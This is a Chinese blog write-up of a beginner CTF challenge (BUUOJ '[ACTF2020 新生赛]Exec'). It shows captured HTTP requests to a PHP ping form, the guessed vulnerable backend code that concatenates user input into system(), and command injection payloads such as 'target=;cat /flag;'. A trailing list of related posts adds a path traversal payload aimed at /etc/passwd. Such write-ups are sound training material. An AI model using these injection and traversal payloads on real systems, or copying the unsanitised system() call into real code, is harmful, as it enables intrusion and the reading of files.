[ACTF2020 新生赛]Exec

时间：2024-10-31 23:01:36浏览次数：6

标签：ACTF2020 127.0 cn Exec 0.1 新生 buuoj application Accept

题目链接：https://buuoj.cn/challenges#[ACTF2020 新生赛]Exec。

打开后，环境如下。

尝试输入 "127.0.0.1"，抓取请求包。

POST / HTTP/1.1
Host: 038dc28f-5191-4958-8946-1127f62ad770.node5.buuoj.cn:81
Content-Length: 16
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://038dc28f-5191-4958-8946-1127f62ad770.node5.buuoj.cn:81
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.155 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://038dc28f-5191-4958-8946-1127f62ad770.node5.buuoj.cn:81/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

target=127.0.0.1

查看响应包。

HTTP/1.1 200 OK
Server: openresty
Date: Tue, 22 Oct 2024 16:25:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.13
Cache-Control: no-cache
Content-Length: 960

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>command execution</title>
    <link href="http://libs.baidu.com/bootstrap/3.0.3/css/bootstrap.min.css" rel="stylesheet" />


</head>
<body>

<h1>PING</h1>
<form class="form-inline" method="post">

    <div class="input-group">
        <input style="width:280px;" id="target" type="text" class="form-control" placeholder="请输入需要ping的地址" aria-describedby="basic-addon1" name="target">
    </div>
    <br/>
    <br/>

    <button  style="width:280px;" class="btn btn-default">PING</button>


</form>
<br /><pre>
PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: seq=0 ttl=42 time=0.033 ms
64 bytes from 127.0.0.1: seq=1 ttl=42 time=0.063 ms
64 bytes from 127.0.0.1: seq=2 ttl=42 time=0.060 ms

--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 0.033/0.052/0.063 ms
</pre></body>
</html>

可以发现，后端似乎是将用户在参数 target 上的输入，与 ping 进行拼接后，当作系统命令去执行，猜测后端代码的实现类似如下（实际上，通过本题的漏洞可以看到源码的实现：target=;cat index.php）。

if (isset($_POST['target'])) {
	system("ping -c 3 ".$_POST['target']);
}

因此，直接对命令进行拼接，即可读取 flag。

POST / HTTP/1.1
Host: 038dc28f-5191-4958-8946-1127f62ad770.node5.buuoj.cn:81
Content-Length: 18
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://038dc28f-5191-4958-8946-1127f62ad770.node5.buuoj.cn:81
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.155 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://038dc28f-5191-4958-8946-1127f62ad770.node5.buuoj.cn:81/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

target=;cat /flag;

标签：ACTF2020,127.0,cn,Exec,0.1,新生,buuoj,application,Accept
From： https://www.cnblogs.com/imtaieee/p/18519103

[ACTF2020 新生赛]Include
链接：https://buuoj.cn/challenges#[ACTF2020新生赛]Include打开环境后如下，只有一个"tips"的超链接。访问tips，留意传入了"file"参数。接下来，可以尝试下路径穿越：?file=flag.php../../../../../etc/passwd。可以看到，存在路径穿越漏洞，但是通过路径穿越漏洞并没有读取到根......
驰骋工作流：以全面配置，重塑企业流程管理新生态
在企业数字化转型的浪潮中，工作流系统已成为企业高效运转的核心驱动力。而驰骋工作流，犹如一颗璀璨的明星，凭借其全面的配置项，在众多工作流解决方案中脱颖而出，为企业流程管理带来了前所未有的便捷与高效。一、全面配置：满足企业复杂多样的业务需求 ......
线程池ThreadPoolExecutor配合callable获得线程执行结果
此处记录使用callable创建线程，使用线程池执行，看下是否有进行线程复用并且FutureTask返回结果线程创建publicclassMyCallableBakeUserimplementsCallable<String>{privateinta;publicMyCallableBakeUser(inta){this.a=a;}@Overrid......
使用ThreadPoolExecutor线程池消化线程执行代码
此处记录一个使用ThreadPoolExecutor线程池的demo线程代码publicclassExcutorRunnableimplementsRunnable{@Overridepublicvoidrun(){System.out.println(Thread.currentThread().getName()+"：线程执行666");try{Thread.......
以execl格式导出账单列表
这个过程主要分为数据处理、Excel文件生成、文件响应给客户端等关键步骤。1.准备数据源首先获取要导出的账单数据，从数据库中查询数据并将其封装为对象列表（如List）。每个对象代表一条账单记录，字段包含账单日期、金额等。List<Bill>billList=billService.getAllBills();2.......
ZZJC新生训练赛第十二场题解
难度分类（同一难度下按字典序上升）入门:G简单:C,E,A中等:F,D,B困难:HG-解题思路按照题意模拟即可G-代码实现#include<bits/stdc++.h>intmain(){std::ios::sync_with_stdio(false);std::cin.tie(0);std::cout.tie(0);std::strings;......
多线程编程ExecutorService用法
以下内容均来自ChatGPT提供的示例，用于自学ExecutorService是Java中用于管理和控制线程池的接口，通常用来简化多线程编程。它提供了一组方法，允许我们在异步任务执行完毕后关闭线程池、调度任务等操作。以下是几个常见的使用场景和示例代码：1.使用ExecutorService执行简单任务......
ScheduledThreadPoolExecutor的介绍与使用
ScheduledThreadPoolExecutor是Java中的一个类，它继承自ThreadPoolExecutor，并实现了ScheduledExecutorService接口。这个类主要用于在给定的延迟之后或周期性地执行任务，是处理定时任务的一个强大工具。一、主要特点线程池大小固定：ScheduledThreadPoolExecutor的线程池大小......
新接口易宝OA-ExecuteSqlForDataSet接口存在SQL注入漏洞
0x01阅读须知本文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考。本文章仅用于信息安全防御技术分享，因用于其他用途而产生不良后果,作者不承担任何法律责任，请严格遵循中华人民共和国相关法律法规，禁......
基于springboot+vue的Java的新生入学报到系统的设计与实现(源码+lw+部署文档+讲解等)
课题摘要本课题聚焦于设计和开发一个高效、便捷、准确的基于SpringBoot+Vue的Java新生入学报到系统，以优化新生报到流程，提高学校迎新工作的效率和质量，为新生提供良好的入学体验。该系统涵盖新生信息管理、报到流程管理、宿舍分配管理、缴费管理、迎新通知与指引、数......

[ACTF2020 新生赛]Exec

相关文章

赞助商

阅读排行